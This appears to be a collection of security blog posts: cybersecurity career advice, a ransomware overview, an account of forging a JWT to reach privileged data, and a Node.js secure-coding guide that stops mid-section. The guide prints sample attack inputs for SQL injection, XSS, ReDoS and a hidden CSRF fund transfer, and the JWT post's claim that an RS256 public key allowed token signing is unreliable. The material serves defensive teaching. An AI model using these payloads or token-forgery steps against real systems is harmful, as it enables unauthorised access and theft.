Faced with such a large pool of applicants, I’d find myself in a dilemma: Who is the right candidate for the company? Who is honest about their skills, and who is exaggerating? How do I select the best candidates? This is why I’ll focus on one crucial section of the resume: the skills section. Do the skills listed in the resume match the job description? If they do, I’ll consider that candidate. However, what if someone is exaggerating their skills? I’ll schedule an interview to find out if they are a hecker or heckler.

I’ll narrow down the applicants by comparing the skills mentioned in the job description (JD) against those listed in their resumes. After this initial process, I’ll be left with around 100 candidates.

Next, I’ll schedule interviews with the remaining candidates to test their skills. Keep in mind, I’m looking for the best of the best. The interview will allow me to see if candidates truly possess the knowledge and skills they claim. I’ll be looking for those who can "put their money where their mouth is."

During the interview process, besides educational qualifications and skills, I’ll also look at their achievements. What distinguishes them from other candidates? What unique qualities or experiences do they bring to the table? These factors will help me select the right candidates.

So, what are those distinguishing parameters? Lets study them in detail.

How Recruiters Distinguish the Best Candidates

• Bug Bounties: Do candidates have bug bounty experience as freshers? Bug bounty hunting involves identifying security flaws, known as "bugs," in popular websites and receiving rewards, or "bounties," from organizations for these findings. By participating in bug bounties, you can earn monetary rewards while building a solid profile within the bug bounty community.

  Don't worry if your bug bounty report is a duplicate—it can still help you stand out from other candidates. Be sure to highlight your bug bounty achievements in both your resume and during your interview.

  

  Some companies even hire bug bounty hunters based on their profiles on platforms like HackerOne, Bugcrowd, or Intigriti. These platforms host bug bounty programs for well-known websites. By participating in these programs, you can be rewarded for finding and reporting bugs. Stay on the lookout for public programs, Vulnerability Disclosure Programs (VDPs), or private programs on these platforms.

• CVEs: Do candidates have experience finding CVEs in applications or products? Vulnerabilities are security flaws in application software that can compromise the confidentiality, integrity, and availability of systems, companies, or individuals. Finding and reporting CVEs (Common Vulnerabilities and Exposures) involves identifying these vulnerabilities, reporting them to the vendor and the National Institute of Standards and Technology (NIST), and receiving a CVE-ID (an identification number assigned to the vulnerability). The vulnerability is then added to the National Vulnerability Database (NVD).

  Experience with finding CVEs indicates that a candidate is well-versed in research. Such candidates are particularly valuable when targeting product-based companies as a cybersecurity researcher. A good way to find CVEs is by identifying vulnerabilities in open-source software. This can earn you recognition from both the open-source and cybersecurity communities, which you can highlight on your resume.

• CTFs: Do candidates have experience participating in Capture The Flag (CTF) competitions? CTFs are contests where participants solve challenges across various categories, such as OSINT, Web, Reverse Engineering, and Forensics, to test their skills and competency. The first person to solve a challenge often receives a "first blood" badge (typically reserved for exceptionally difficult challenges). Participants earn points based on the number of challenges solved, which contribute to their overall score. CTF organizers maintain a leaderboard to rank candidates by their scores. The top 3 score holders on the leaderboard are awarded by the organizing team once the CTF competition ends.

  Participation in CTFs demonstrates a candidate's proficiency in critical thinking, research, and application. High rankings in CTF competitions, whether local (Indian-based) or global, attract the attention of HR professionals and indicate that a candidate is among the top performers worldwide. Unlike other candidates, those who excel in CTFs are actively testing their skills against many peers. You can find CTF competitions listed on ctftime.org or ctf.hackthebox.com. I recommend starting by playing solo to develop your skills; once you feel more confident, search for a team and participate with them.

  Some companies, including TCS, KPMG, Payatu, and Cloudsek, specifically recruit through CTF competitions. Therefore, it’s highly beneficial to highlight your CTF rankings on your resume.

• Internships: Do candidates have prior internship experience related to cybersecurity? Internship experience, regardless of its duration (whether 3 months or 6 months), plays a crucial role in the selection process. Recruiters often prefer candidates who have some experience, as it minimizes the time and effort needed to train someone from scratch. They look for individuals who are already familiar with corporate culture, client interactions, and job responsibilities.
  To gain internship experience, consider targeting cybersecurity startups. These companies often offer valuable hands-on experience and can be more flexible in providing opportunities. Be sure to highlight your internship experience as an achievement on your resume, as it demonstrates your practical knowledge in the field.
  If you haven’t secured an internship in the corporate world, consider exploring unpaid internships. Three notable options are:

  • Gurugram Police Cyber Security Summer Internship Program: This program typically starts in June. For more details, check the official handle of Dr. Rakshit Tandon who is the brains behind this amazing endaevor for updates.

  • Maharashtra Cyber Cell Internship Program: Information about this program is available on the Maharashtra Cyber Cell’s official Instagram handle.

  • Cyber Secured India Internship Program: This program, led by Nikhil Mahadeshvar, offers an exciting opportunity for mentorship by experts and practical exams that simulate real-world scenarios—all for free. This deserves an honorable mention. The updates are available on Cyber Secured India’s official handle.

These internships offer valuable experience and can be a great addition to your resume if you're looking to build your cybersecurity skills.

• Certifications: Do candidates hold any cybersecurity certifications? Certifications play a crucial role in the cybersecurity domain as they offer third-party validation of a candidate's skills. However, not all certifications are equally valued by recruiters. The certifications most recognized by HR professionals for different roles include CEH (Certified Ethical Hacker), Security+, and OSCP (Offensive Security Certified Professional).

  If you’re unsure which certification to pursue or want to learn more about the certification landscape, feel free to share this blog with your peers or give me a shoutout on LinkedIn. I’ll gladly create another blog focused on cybersecurity certifications.

  Moreover, certifications are especially important in consultancy firms, as they play a key role in securing projects from clients

  

• Degree: Does the candidate have a degree in the cybersecurity domain? Do degrees matter? The answer is both yes and no—it depends on the recruiter. Candidates with a specialization in cybersecurity often receive higher priority compared to those with degrees in IT or Computer Science Engineering (CSE). It’s a hard pill to swallow, but it reflects the current hiring trends. However, don’t lose hope! You can always work on developing the other factors that set you apart and make you a strong candidate for cybersecurity roles.

• Training Platforms: Does the candidate have a profile on cybersecurity training platforms? Platforms like TryHackMe, Hack The Box (HTB), or PortSwigger Academy provide freshers with opportunities to practice and hone their skills. These platforms offer hands-on labs and study materials, enabling users to legally hack systems or defend them, simulating real-world scenarios. Rankings on platforms like TryHackMe or HTB carry significant weight with recruiters, especially those with technical expertise.

  Additionally, an impressive HTB ranking can open doors to remote job opportunities globally. If you have notable rankings or achievements on these platforms, be sure to highlight them in your resume

  

• Projects: Has the candidate worked on any cybersecurity projects? Projects are especially important for freshers as they demonstrate a genuine passion for the field. Projects tailored to different roles can capture the attention of recruiters and show that the candidate is committed to developing practical skills.

  Examples of valuable projects include setting up a home lab, building a keylogger, or creating a SIEM (Security Information and Event Management) monitoring system. These projects not only showcase technical abilities but also set you apart from other candidates. Be sure to build meaningful projects, showcase them on GitHub, and include them in your resume to enhance your candidacy.

• Referrals: Does the candidate have a referral from an employee of the company? Referrals are incredibly valuable, especially in the competitive cybersecurity job market. They indicate that the candidate has relevant skills and is endorsed by someone within the company. As the saying goes, “In cybersecurity, you need to polish your networking skills, both technically and figuratively.”

  Building a strong network makes it easier to receive referrals from employees across organizations. In many cases, a referral can help you bypass the CV selection stage and move directly to the technical or HR interview round. Your network significantly impacts your career, establishing your "net worth" in the industry. Communities play a key role in this, which we'll explore further in the next point.

  

• Communities: Is the candidate involved in any cybersecurity communities? Communities play a vital role in expanding your network, connecting with like-minded peers, and gaining referrals from experienced professionals. Attending or speaking at conferences and events organized by these communities allows you to interact with individuals from various cybersecurity domains. Presenting at a local chapter event boosts your confidence, showcases your skills to recruiters, and attracts interest from industry professionals.

  Breachforce is one such community where you can learn new technologies, network with others, and exchange knowledge. If you come across any events hosted by Breachforce, be sure to check them out. Additionally, look for local chapters of cybersecurity communities in your area on LinkedIn. Volunteering at these communities can also help you develop valuable soft skills like teamwork, communication, coordination, leadership, and decision-making.

  So far, I’ve covered numerous points that can help you enhance your resume and stand out from the competition in the cybersecurity job market. Many of these strategies also apply to working professionals looking to further their careers or transition into the cybersecurity field.

Getting job as a working professional

As a working professional, you likely have valuable work experience that can strengthen your resume. HR’s highly value work experience, especially in cybersecurity. Whether you're looking to pivot from your current career into cybersecurity or transition from a non-tech domain to a tech-focused role, your prior experience can be a major asset.

Below are key factors that can help you stand out from other candidates:

• Work Experience: Does the candidate have prior work experience before applying for this role? Work experience is one of the most significant factors in securing a cybersecurity job. You should highlight your previous work experience and how it aligns with your current professional pursuits in cybersecurity. However, be prepared to answer the common interview question: "What is your reason for switching to cybersecurity?" Your ability to explain this transition passionately can convince HR to take a chance on you.

• The key is to relate your experience in your previous domain to the cybersecurity field. For example:

  1. A Web Developer can highlight their expertise in building systems to qualify for a Web Penetration Tester role.

  2. A Systems Administrator can emphasize their knowledge of configuring and managing systems for an Infra Penetration Tester role.

  3. A Network Administrator can draw on their understanding of network configurations to transition into a Network Penetration Tester role.

In general, companies tend to prefer professionals with work experience over freshers, but you must be able to demonstrate your skills and knowledge for the role you're applying for.

• Internal Switch: As a working professional, you may have the opportunity to switch internally within your organization. If there is an opening in the cybersecurity department, you can recommend yourself for the role to HR. However, before approaching HR, it’s a good idea to first have a conversation with the department head or project manager to express your interest and gather any insights about the role. This proactive approach can increase your chances of making a successful internal transition.

• Referrals: As mentioned earlier, referrals play a crucial role in securing a job in cybersecurity. As a working professional, obtaining referrals is generally easier than it is for freshers. Having a referral from someone within the company can significantly boost your chances of getting noticed, as it serves as a strong endorsement of your skills. For more details, refer to the "Referrals" section earlier in this blog.

Consider all the factors mentioned above when applying for a cybersecurity role, whether you are a fresher or a working professional. Incorporating these parameters into your skillset will undoubtedly strengthen your resume and increase your chances of being selected for a cybersecurity position. Best of luck on your cybersecurity journey! Don’t forget to follow Me and Breachforce on LinkedIn for more insightful content!

Remember WannaCry ? Back in 2017, it ripped through over 150 countries in a matter of days. Britain's National Health Service got knocked offline, causing total chaos. Since then, ransomware has only gotten worse.

And these hackers fight dirty. They're not just encrypting your files anymore. It steals your data first and threaten to leak it if you don't pay. It's a two punch known as double extortion. Just ask companies like Travelex and Kaseya how much fun that is.

What is Ransomware?

At its core, ransomware is malicious software that locks or encrypts your files, making them inaccessible. The cyber thieves, then, request a ransom, usually settled in cryptocurrency, to give a decryption key. Should you not pay, there is a risk of losing your data forever - or worse still, having it exposed in public.

It commonly enters systems via phishing emails and malicious attachments, as well as through vulnerabilities in outdated software. Some of the most infamous ransomware variants include WannaCry, Ryuk, and REvil (Sodinokibi), all of which have resulted in causing significant destruction through differences in attacking methods but with one common purpose: extortion.

Notable Ransomware Attacks:

• Ryuk (2018)

Ryuk is a ransomware strain, known to be used in targeted attacks on large firms, especially organizations working in healthcare and government sectors. In 2019, Ryuk attacked the city of New Orleans, resulting in a shutdown of essential city services.

Whereas WannaCry was highly indiscriminate, Ryuk operates with precision and sophistication. It demands exorbitant ransom payments, often reaching millions of dollars.

Ryuk typically infiltrates systems through other malware like Emotet. Once inside, it encrypts critical files and demands a hefty ransom.

• Sodinokibi (REvil) (2019)

REvil, also known as Sodinokibi, came out in 2019 and gained a name for its double extortion tactics: encrypting data and stealing sensitive information and threatening to release it unless a ransom is paid.

In 2020, REvil targeted a major financial service provider, Travelex. The attack saw a widespread disruption in ATM services. The attackers demanded $10 million, complicating the recovery process due to the compromised customer data.

Forensics Insight: The double extortion technique is on the rise. Hackers encrypt files and steal sensitive data, forcing victims to choose between paying for decryption or risking the exposure of confidential information.

Why Is Ransomware Getting Worse?

Ransomware is no longer just a nuisance - the bad guys got organized. They're running ransomware like a business now. Some groups even have customer service to help victims pay the ransom. Here's why it's getting worse:

1. Hitting Critical Infra

Critical sectors, namely healthcare, energy and transportation are juicy targets. Such sectors cannot afford downtime, so they are more likely to pay the ransom to avoid a major system disruption.

2. Double Extortion

The threat of leaked data is sometimes scarier than being locked out of files. This has brought ransomware attacks to a whole new level, double extortion meaning pressure on organizations to pay up.

Exemplification: The REvil Group in 2021 used double extortion to target the software firm Kaseya. They encrypted files, stole data, and threatened to leak it unless a ransom was paid. This attack targeted thousands of businesses globally, showcasing the resultant attack outcome from such an approach.

3. Ransomware-as-a-Service (RaaS)

Due to RaaS, even not-so-tech-savvy punks have now become able to embark on complex attacks with rented ransomware tools. As a result, most attacks are performed by organized cybercrime groups.

Exemplification: In 2020, the Maze ransomware group popularized RaaS, allowing criminals with minimal skills to execute large-scale attacks. This model has since been embraced by several other groups, simplifying the initiation of such operations.

How Can You Protect Your Organization?

There’s no silver bullet, but these can make your org a harder target to attack, a multi-layered approach:

• Regular Backups - Always back up critical data and store the backups securely, offsite. Always test your backups to ensure they can be restored.

• Patch Management - Keep your systems updated with the current security patches. Exploited vulnerabilities are one of the main entry points for ransomware.

• Employee Training - Because attacks often target employees, training staff to recognize suspicious emails and attachments is important.

• Use Endpoint Protection - Use advanced security tools such as Endpoint Detection and Response (EDR) to detect and prevent ransomware from spreading.

• Network Segmentation - Divide your network to limit damage in case of attack. You can confine the ransomware to a small section of your system.

• Multi-Factor Authentication (MFA) - MFA adds an additional layer of protection. Even if a thief steals login credentials, he won't be able to get access to your system without the second factor.

• Incident Response Plan - Create and periodically update an incident response plan. A well-planned strategy can reduce downtime as well as impact of an attack in general.

Should You Pay the Ransom?

Paying the ransom may seem to be the fastest way out. But there are risks to consider:

• No guarantee of access to your files when you pay the ransom, nor will this stop attackers from leaking your data. It fuels cybercrime, making attacks more profitable and encouraging future ones by paying the ransom.

• In some countries, providing a ransom may even be illegal because attackers are tied to criminal organizations against whom sanctions have been placed.

Experts generally advise against paying ransoms. Instead, focus on prevention, recovery, and working with law enforcement.

Conclusion

Ransomware attacks are increasingly gaining pace, but if careful planning is taken, you can save your organization. A crucial defense against such attacks is a set of well-regularly updated backups, best security practices, as well as proper employee training. The only way to prepare for the worst is by staying informed and vigilant.

Let’s set the scene: You’re logging into a website, feeling pretty secure about your data. You trust that the developers have done everything right. Now, imagine a scenario where, with just a few small adjustments, someone can gain access not just to your profile but to other private data and sections of the website that were never meant for them. Surprising, right? Well, that’s exactly what happened in a recent security assessment I conducted. The website I assessed was using JSON Web Tokens (JWTs) for managing user sessions. Now, JWTs are fantastic when used correctly, but a few oversights in their implementation here turned a strong security measure into a vulnerability. This blog isn’t about calling anyone out - it’s about sharing what happened so that we can all learn and implement better security practices. So, let’s walk through the process together.

Identifying JWT-Based Authentication

It all started when I noticed how the website managed user sessions. After logging in, I saw that a small token was exchanged between the server and client: a JSON Web Token (JWT). JWTs are like the digital equivalent of a driver’s license—they contain the user's identity and their permissions in the system. They consist of:

• Header: States the signing algorithm (e.g., HS256, RS256).

• Payload: Holds the user’s data (user_id, role, etc.).

• Signature: Verifies the token’s integrity.

Here’s a simplified example of what a JWT looks like:

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoiMTIzNDUiLCJyb2xlIjoidXNlciJ9.signature

This was my first clue that the application used JWTs to manage user access. Now, JWTs are great, but if not used carefully, they can be easily manipulated. This is where things started getting interesting.

Decoding the JWT Token

To dig deeper, I decoded the JWT. Remember, JWTs are encoded using Base64, so decoding isn’t "hacking"—it’s just revealing what’s already there. I used jwt.io for this purpose. When decoded, I found:

• User ID (sub) : A unique identifier for the user.

• User Role (role) : Indicates the user’s access level.

• Resource ID(resource_id) : Connects to specific data within the application

At this point, I started seeing potential problems. If the application solely relies on these claims to control access, manipulating them could allow me to access unauthorized information.

Finding a File with No Access Control

Next, while poking around the application, I found a file that was accessible without any authentication. It contained sensitive information like:

• Email address: Personal and business emails of employees.

• Resource ID (resource_id): Unique identifiers linked to each user.

This file should have been behind some form of access control, but it wasn’t.

The resource_id was key. It suggested that the application might use it to control data access. With the right tweak, this could open a much bigger security hole.

Intercepting a URL That Uses the Resource ID

https://www.redacted.com/api/redacted-resources?populate[redacted_role][populate]=*&populate[redacted_facilities][populate]=*&filters[resourceId][$eq]=auth0|64e855fd6ab522fredacted

This confirmed that the application was using the resource_id to control access. It meant that if I could manipulate the JWT to use a different resource_id, I could potentially see data belonging to other users.

Manipulating the JWT Token

Now, it was time to test this theory. I went back to jwt.io and modified the token’s payload to include a different resource_id and altered other claims (like the user ID and role). Here's what I did:

1. Modify the Payload: Changed the sub (user ID) and resource_id to impersonate another user, possibly with higher privileges.

2. Sign the Token: The app was using the RS256 algorithm. During earlier investigation, I found that the server’s public key was exposed, which let me create a new, valid token.

3. Replace the Original Token: I injected the new JWT into the request headers, replacing the original token.

Gaining Access to a Completely Different UI

With the manipulated JWT in place, I sent the request, and bingo! The server granted access to a whole new user interface meant for users with higher privileges. This confirmed that the application relied entirely on the JWT claims without additional server-side checks.

Why This Matters: This revealed a major flaw in the application’s design—blindly trusting the JWT without server-side verification. By tampering with the token, I could gain access to settings and data that were never intended for my user role.

Unearthing More Sensitive Information

The new UI provided access to more sensitive information, including employee records, internal settings, and healthcare facility data. This wasn’t an isolated issue; it showed a deeper problem with the application’s access control mechanisms.

Why Screenshots of This Step Aren’t Provided

Before we go any further, I want to point out that I won’t be sharing certain screenshots for ethical reasons:

1. The Restricted UI: Accessing this revealed sensitive controls and data, which I can’t share without risking the application's security.

2. The Actual Website: Identifying the website would expose it to potential exploitation and risk the privacy of its users.

3. Additional Sensitive Information: Some information was too personal to share publicly.

I hope you understand that some things must remain private to protect those involved.

The Importance of Access Control and Data Obfuscation

Now, let's talk about what this means. This case highlights just how crucial access control and data obfuscation are. JWTs are a fantastic tool for managing user sessions, but they need to be used with caution. Here are the key lessons from this assessment:

1. Access Control: Why It’s Non-Negotiable

Access control is the cornerstone of application security. It’s what defines who can access what within your application. In this scenario, the application relied solely on the JWT's content for access control, without verifying the user’s permissions server-side. This was a critical oversight.

Why It Matters:

• Don’t Trust the Client: Never trust data that comes from the client side (like JWT claims) without verifying it on the server. Otherwise, an attacker who can manipulate a token gains access they shouldn’t have.

• Enforce Granular Permissions: Use role-based access control (RBAC) or attribute-based access control (ABAC) to ensure each user can only access what they’re supposed to.

2. Data Obfuscation: Minimising Data Exposure

This application exposed sensitive information like resource_id and email addresses through publicly accessible endpoints. This data was used to manipulate the token and gain unauthorised access.

Why It Matters:

• Limit Data Exposure: Only share what’s absolutely necessary with the client. Avoid including sensitive identifiers in JWTs or public API responses.

• Use Obfuscation Techniques: Obfuscate identifiers like resource_id to make it harder for attackers to guess or misuse them.

A Call to Developers: Building a Security-First Mindset

Alright, developers and security professionals, listen up: security is everyone’s responsibility. Here’s what you can do to build a security-first mindset:

• Think Like an Attacker: Regularly test your own application with a hacker’s mindset. How would you try to break it? If you’re using JWTs, think about what an attacker might do if they could manipulate them.

• Enforce Server-Side Validation: Always validate access controls server-side. Never trust what the client sends you without double-checking it.

• Obfuscate Data: Use data obfuscation to make it harder for attackers to extract useful information. Make sure your endpoints only expose the minimal data required.

Conclusion: Security Is a Shared Responsibility

This assessment is a clear example of how small oversights can snowball into major security issues. It started with identifying JWT usage, moved through decoding and manipulating the token, and ended with unauthorised access to sensitive data.

To every developer and security team out there: Take access control seriously. Always verify data server-side, minimize data exposure, and use JWTs securely. The digital world we live in is increasingly vulnerable to attacks, and protecting user data isn’t just a technical requirement - it’s an ethical one.

By adopting a security-first mindset and continuously learning from real-world vulnerabilities, we can create applications that are not only functional but also secure and trustworthy. Every little precaution counts. Stay vigilant!

As a developer, I hadn’t really come across such heavy security concepts before. Sure, I knew about authentication and basic access controls, but hearing terms like Cross-Site Scripting and SQL Injection thrown around like they were common knowledge was a whole new level. To be honest, it was intimidating and overwhelming— I didn’t understand half of what they were talking about. I had never really come across these heavy security concepts before. And suddenly, I realised there was a lot more to learn.

Instead of feeling defeated, I decided to turn it into a learning experience. I would sit next to the VAPT engineers, asking them what each issue meant and how I could fix it. I’d go back to my desk, Google each term (yep, this was before the days when we could just “ChatGPT” everything), and spend nights debugging my code, trying to make it secure enough to stand up to their scrutiny.

Slowly but surely, I started to understand what those vulnerabilities meant, why they mattered, and — most importantly — how to fix them. It wasn’t easy, but I knew that with every bug I squashed, I was making my app safer for our users.

And that’s exactly why I’m writing this guide — so that you don’t have to go through the same confusion and frustration I did. Whether you’re a seasoned developer or new to security concepts, I want to help you understand these vulnerabilities in a straightforward way and show you how to fix them in your Node.js applications. With practical examples, easy-to-digest explanations, and the right coding techniques, we’ll make sure that your apps are not just functional, but secure enough to withstand even the most rigorous VAPT review.

Ready to dive into the world of secure coding? Let’s make your Node.js applications bulletproof together! 🚀

What is VAPT?

Vulnerability Assessment and Penetration Testing (VAPT) is a process used to identify and fix security weaknesses in an application. It consists of two parts:

• Vulnerability Assessment: A systematic review of the security holes present in your code.

• Penetration Testing: Simulated attacks on your application to see how those vulnerabilities can be exploited in the real world.

Think of VAPT as a safety checkup for your code, exposing potential security flaws before an attacker does. It can be nerve-wracking, but it’s absolutely necessary to ensure your app is production-ready. In this guide, I’ll walk you through some of the most common vulnerabilities you might encounter and show you how to fix each one. Let’s secure that code, one bug at a time! 💡🔒

1. Injection Attacks (SQL, NoSQL)

Injection attacks, such as SQL or NoSQL injection, occur when an attacker sends input that is interpreted as part of the command by the database instead of as plain data. These attacks can result in unauthorised access, data breaches, and data corruption.

How It Affects Your System

An attacker might gain access to sensitive data, such as user credentials, by manipulating the input fields in your application to alter SQL or NoSQL queries. In more severe cases, SQL Injection can also be used to gain a foothold into the system, potentially leading to Remote Code Execution (RCE), where an attacker can execute arbitrary code on your server. This escalates the attack from simply accessing data to potentially taking full control of the system.

Must Watch - Understanding SQL Injection and RCE in Action

Example Scenario

Suppose your Node.js app allows users to search for books by category:

// Bad: Directly concatenating user input into SQL query
app.get('/books', (req, res) => {
  const category = req.query.category;
  const query = `SELECT * FROM books WHERE category = '${category}'`;
  db.query(query, (err, results) => {
    if (err) {
      res.status(500).send('Error fetching data');
    } else {
      res.json(results);
    }
  });
});

If a user sends a request with the following URL:

https://api.example.com/books?category=science' OR '1'='1

The resulting query becomes:

SELECT * FROM books WHERE category = 'science' OR '1'='1';

This would return all books because the condition '1'='1' is always true. An attacker could further manipulate this to extract sensitive data.

Good Code Practice

// Good: Using parameterized queries to prevent SQL injection
app.get('/books', (req, res) => {
  const category = req.query.category;
  const query = 'SELECT * FROM books WHERE category = ?';
  db.query(query, [category], (err, results) => {
    if (err) {
      res.status(500).send('Error fetching data');
    } else {
      res.json(results);
    }
  });
});

Why This Works

Parameterized queries ensure that user inputs are treated as values rather than part of the SQL syntax. This prevents attackers from altering the structure of the SQL statement.

2. Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) occurs when an attacker injects malicious JavaScript into your web application. This script then runs in the browser of any user who accesses the affected page, allowing attackers to steal cookies, session tokens, or other sensitive data.

How It Affects Your System

XSS can allow attackers to hijack user sessions, steal credentials, and even alter the appearance or behaviour of your web pages, significantly compromising user trust and data integrity.

Example Scenario

Consider a feature in your application where users can post text that is rendered on a page:

// Bad: Rendering user input without sanitization
const userInput = "<script>alert('XSS!')</script>";
res.send(`User comment: ${userInput}`);

If user input is rendered directly, any JavaScript included by the attacker will execute when the page loads in a user’s browser.

Good Code Practice

// Good: Using a library to escape HTML characters
const escape = require('escape-html');
const userInput = "<script>alert('XSS!')</script>";
res.send(`User comment: ${escape(userInput)}`);

Why This Works

Using a library like escape-html ensures that any HTML tags in user input are treated as plain text, preventing them from being executed as scripts.

3. Insecure Direct Object References (IDOR)

IDOR (Insecure Direct Object Reference) occurs when a user can access resources or objects directly by manipulating input values such as URL parameters without proper authorization checks. While this vulnerability is commonly found in URL parameters, it can also occur in other parts of a request, such as form inputs, headers, or cookies, wherever user input is used to directly reference resources without validation.

How It Affects Your System

IDOR can expose sensitive data to unauthorized users, such as accessing another user’s profile or viewing confidential documents.

Example Scenario

Imagine an endpoint where users can view their profile:

// Bad: Allowing direct access to user IDs without checks
app.get('/profile/:userId', (req, res) => {
  const userId = req.params.userId;
  User.findById(userId, (err, user) => {
    res.json(user);
  });
});

An attacker could alter the userId parameter to access other users’ data:

https://api.example.com/profile/12345

Good Code Practice

// Good: Verifying that the authenticated user can access the requested resource
app.get('/profile/:userId', (req, res) => {
  const userId = req.params.userId;
  if (req.user.id !== userId) {
    return res.status(403).send('Access Denied');
  }
  User.findById(userId, (err, user) => {
    res.json(user);
  });
});

Why This Works

By checking that the authenticated user’s ID matches the requested userId, we ensure that users can only access their own data.

4. Denial-of-Service (DoS) Vulnerabilities

Denial-of-Service (DoS) attacks aim to overwhelm a server with a high volume of requests, consuming its resources like bandwidth, CPU, and memory, which makes the server unavailable to legitimate users. This can be particularly damaging to public APIs or services, leading to a degraded user experience due to downtime and potentially causing significant financial losses, such as disrupted services and lost revenue. Unlike standard DoS attacks that originate from a single source, Distributed Denial-of-Service (DDoS) attacks involve multiple systems, making them even harder to mitigate and more destructive. For example, an e-commerce website facing a DoS attack during peak shopping seasons might experience outages, resulting in lost sales and a tarnished reputation.

How It Affects Your System

DoS attacks can severely impact the performance and availability of your application. They may cause your server to slow down, making it difficult for legitimate users to access your services, or even render your application completely unresponsive. The increased load can exhaust server resources like memory, CPU, and network bandwidth, leading to system crashes or forced restarts. This kind of disruption can result in lost revenue, especially if your application is critical to business operations. Additionally, prolonged unavailability can damage your brand’s reputation, erode customer trust, and incur costs for mitigation and recovery.

a) Example Scenario: Missing Payload Size Limitation (Vulnerable to Large Payload Attack)

Consider an endpoint that processes large JSON payloads:

// Bad: No size limit on JSON payloads
app.post('/data', (req, res) => {
  const data = req.body;
  // Process data without validation
  res.send('Data processed');
});

An attacker could send an enormous payload, causing the server to run out of memory and crash.

Good Code Practice: Payload Size Limitation

// Good: Limiting payload size
const express = require('express');
const app = express();

app.use(express.json({ limit: '1mb' })); // Limit payload to 1MB

app.post('/data', (req, res) => {
  const data = req.body;
  // Process data
  res.send('Data processed');
});

Why This Works

By setting a size limit for incoming JSON payloads, you prevent attackers from overwhelming your server with large requests.

b) Example Scenario: Missing Rate Limiting (Vulnerable to Request Flood Attack)

Another way DoS attacks can occur is when your server is overwhelmed with requests from multiple sources without proper rate limiting. An attacker could flood the endpoint with requests, which may crash the server or significantly slow down its performance.

Good Code Practice: Adding Rate Limit

// Good: Adding rate limit
const rateLimit = require('express-rate-limit');

const limiter = rateLimit({
  windowMs: 1 * 60 * 1000, // 1 minute
  max: 100, // Limit each IP to 100 requests per window
});

app.use(limiter); // Apply the rate limiting middleware

app.post('/data', (req, res) => {
  const data = req.body;
  // Process data
  res.send('Data processed');
});

Why This Works

Rate limiting helps mitigate excessive requests from a single source, preserving server resources and maintaining application availability. By implementing this measure, you ensure that legitimate users can access the service without interruption.

c) Example Scenario: Vulnerable to Regular Expression Denial of Service (ReDoS)

A ReDoS attack exploits the fact that certain regular expressions can take an exponential amount of time to evaluate when applied to maliciously crafted input, effectively causing the system to hang or enter a "pause" mode. This is particularly dangerous if the regex is used for input validation in an API that accepts user input.

// Bad: Vulnerable regex pattern
const regex = /^(a+)+$/;

app.post('/validate', (req, res) => {
  const { input } = req.body;
  if (regex.test(input)) {
    res.send('Valid input');
  } else {
    res.send('Invalid input');
  }
});

An attacker could submit a string like "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!", which can cause the regex engine to backtrack excessively, resulting in high CPU usage and making the server unresponsive.

Good Code Practice: Using Safe Regular Expressions

// Good: Using a safer regex pattern or limiting input length
const safeRegex = /^a{1,100}$/; // Limits 'a' repetitions to a safe range

app.post('/validate', (req, res) => {
  const { input } = req.body;

  // Alternatively, limit input length before testing with regex
  if (input.length > 100) {
    return res.status(400).send('Input too long');
  }

  if (safeRegex.test(input)) {
    res.send('Valid input');
  } else {
    res.send('Invalid input');
  }
});

Why This Works

By using safer regex patterns or limiting input length, you can avoid the risk of excessive backtracking that can lead to ReDoS attacks. This keeps the server responsive and protects against unexpected resource exhaustion.

5. Improper Authentication and Authorization

Improper Authentication and Authorization occur when an application does not correctly verify the identity of users or their permissions.

How It Affects Your System

Weak authentication mechanisms can lead to unauthorized access, allowing malicious users to exploit sensitive areas of your application. This can result in data breaches, unauthorized data manipulation, and overall compromise of user trust.

Example Scenario

Consider a login endpoint:

// Bad: Using predictable tokens for authentication
const token = req.headers['authorization'];
if (token === '12345') {
  // Grant access
}

This approach allows anyone who knows the token to gain access or any attacker who is able to brute-force it. The predictability of the token ('12345') means that an attacker can easily guess or automate attempts to gain access, leading to serious security vulnerabilities.

Brute-forcing the token is alarmingly simple. Given that the token is a short numeric string, an attacker could employ a basic script to iterate through all possible combinations (e.g., from 00000 to 99999). This would require only a few seconds or minutes, depending on the attacker's hardware and the implementation of any rate-limiting or lockout mechanisms in the application.

Good Code Practice

// Good: Using JWT for secure authentication
const jwt = require('jsonwebtoken');
require('dotenv').config();

// Load secret key from environment variable
const secretKey = process.env.SECRET_KEY; 

// Middleware to verify JWT token
function verifyToken(req, res, next) {
  const token = req.headers['authorization'];
  if (!token) return res.status(403).send('Forbidden');

  jwt.verify(token, secretKey, (err, decoded) => {
    if (err) return res.status(403).send('Invalid token');
    req.user = decoded; // Attach user info to request
    next();
  });
}

// Protected route example 
// verifyToken will be called as it is one of the middleware now
app.get('/protected', verifyToken, (req, res) => {
  res.send(`Welcome user with ID: ${req.user.id}`);
});

Why This Works

Using JSON Web Tokens (JWTs) [jsonwebtoken] provides a secure and verifiable method of authenticating users because they encapsulate all necessary user information in a self-contained format. JWTs are signed, ensuring integrity and authenticity, which prevents tampering. They also support expiration times, limiting access duration and reducing security risks. Additionally, JWTs can carry custom claims for flexible role-based access control and are suitable for cross-domain applications. This combination of features enables efficient, stateless authentication while ensuring that only authorized users can access protected resources.

6. Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) is an attack that tricks a user into executing unwanted actions on a web application where they are authenticated. The attack relies on the victim’s browser being tricked into sending a request to the web application using the victim’s active session or credentials.

How It Affects Your System

CSRF attacks can result in unauthorized actions being performed on behalf of authenticated users. This can include actions like changing account settings, making transactions, or even stealing sensitive information by tricking the user into making requests they never intended to.

Example Scenario

Imagine a banking application where a user can transfer funds by visiting a specific URL:

<!-- User's bank account transfer form -->
<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to" value="attacker_account">
  <button type="submit">Transfer</button>
</form>

An attacker could trick a user into submitting this form by embedding a malicious element on their own website. The attacker’s malicious page could contain the following HTML:

<!-- Malicious page -->
<img src="https://bank.com/transfer?amount=1000&to=attacker_account" style="display:none">

If the victim is logged into their banking application, simply visiting the attacker’s page will trigger this hidden request, resulting in the transfer of funds without the user’s consent. This attack is possible if the banking application incorrectly accepts GET requests for state-changing actions, such as transferring funds.

Good Code Practice

To protect against CSRF attacks, you can implement anti-CSRF tokens. This involves adding a token to forms and validating it on the server side:

